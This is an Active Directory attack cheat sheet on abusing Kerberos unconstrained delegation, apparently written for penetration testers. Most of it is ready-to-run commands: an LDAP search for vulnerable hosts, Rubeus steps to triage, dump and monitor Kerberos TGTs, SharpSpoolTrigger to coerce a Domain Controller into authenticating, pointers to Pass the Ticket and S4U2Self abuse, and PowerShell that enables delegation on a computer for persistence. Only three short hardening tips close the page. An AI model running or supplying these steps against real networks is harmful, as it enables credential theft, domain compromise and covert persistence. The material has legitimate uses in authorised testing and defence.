Unconstrained Delegation

Table of contents

1. Vulnerability
2. Prerequisites
3. Exploit
4. Persistence
5. Recommendations

---

Vulnerability

Unconstrained delegation allows a machine to act on behalf of any user for any service. If you compromise a machine that can perform unconstrained delegation, you can leverage this feature to escalate your privileges.

Unconstrained delegation only works with Kerberos authentication.

Prerequisites

• Having compromised a domain joined computer with unconstrained delegation allowed.

Exploit

# Look for vulnerable domain computers.
./ADSearch.exe --search "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" --attributes samaccountname,dnshostname

# From your target - a Domain Controller by any change -, initiate any interaction with the server trusted for delegation that involves Kerberos authentication.
dir \\$CompromisedServerVulnerableToUnconstrainedDelegation\C$

# On the compromised domain computer, list Kerberos TGTs.
./Rubeus.exe triage

# Extract TGTs you want to abuse.
./Rubeus.exe dump /luid:$LUID

Another way to perform this attack is to force your target (let’s say a Domain Controller) to authenticate on the server you compromised. To do so, you can use SharpSpoolTrigger. It will force the authentication and you could therefore capture the Kerberos TGT with Rubeus.

# Capture Kerberos tickets every 10 seconds on the computer you compromised.
./Rubeus.exe monitor /interval:10 /nowrap

# Listener is the host on which you are monitoring Kerberos tickets with Rubeus.
./SharpSpoolTrigger.exe $TargetFQDN $ListenerFQDN

Depending of the nature of TGTs, perform either:

• Pass the Ticket with users’ TGTs (identifiable via service krbtgt/$domain).
• S4U2Self Abuse with machines’ TGTs.

Persistence

Allowing delegation for a domain computer requires SeEnableDelegationPrivilege, that is by default granted to Domain Admins and Enterprise Admins only. If you are Domain Admin, you can grant this privilege to any user, or enable delegation for any computer.

# Enable unconstrained delegation for a domain joined computer.
$Computer = Get-ADComputer -Identity "$ComputerName"
$Computer.TrustedForDelegation = $True
Set-ADComputer -Instance $Computer

Recommendations

• Avoid using unconstrained delegation, use constrained delegation or resource-based constrained delegation instead.
• Enforce Account is sensitive and cannot be delegated for privileged domain users.
• Limit services on which privileged domain users can authenticate to avoid caching Kerberos tickets.